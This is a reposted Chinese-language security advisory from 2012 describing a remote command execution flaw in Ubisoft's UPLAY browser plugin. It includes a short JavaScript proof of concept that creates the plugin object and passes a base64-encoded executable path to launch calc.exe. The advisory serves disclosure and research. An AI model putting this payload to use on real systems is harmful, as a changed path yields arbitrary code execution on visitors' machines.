Ubisoft Entertainment UPLAY 'OBJECT'控件远程命令执行漏

发布日期:2012-07-29
更新日期:2012-07-31

受影响系统:
Ubisoft Entertainment UPLAY
描述:
--------------------------------------------------------------------------------
Ubisoft Entertainment于1986年在法国巴黎成立,目前已经是全球领先交互式娱乐软件开发和发行公司之一。Uplay是与育碧游戏捆绑的一个系统,它有防盗、奖惩的功能,是Ubisoft为扩展自家游戏的延伸价值而开发的,正版玩家可以在游戏过程中解锁各种成就,然后用成就点数换取特殊奖励,比如特殊套装等。同时也会提供一些收费道具给玩家购买。

UPLAY在其控件'OBJECT'的实现上存在安全漏洞,远程攻击者可利用此漏洞远程启用Windows内置计算器,从而执行任意命令,控制用户系统。

<*来源:Tavis Ormandy (taviso@gentoo.org
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Tavis Ormandy (taviso@gentoo.org)提供了如下测试方法:
x = document.createElement('OBJECT');
x.type = "application/x-uplaypc";
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode
-uplay_dev_mode_auto_play")

$ printf "C:\\WINDOWS\\SYSTEM32\\CALC.EXE" | base64
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ==

建议:
--------------------------------------------------------------------------------
厂商补丁:

Ubisoft Entertainment
---------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wypxwx.html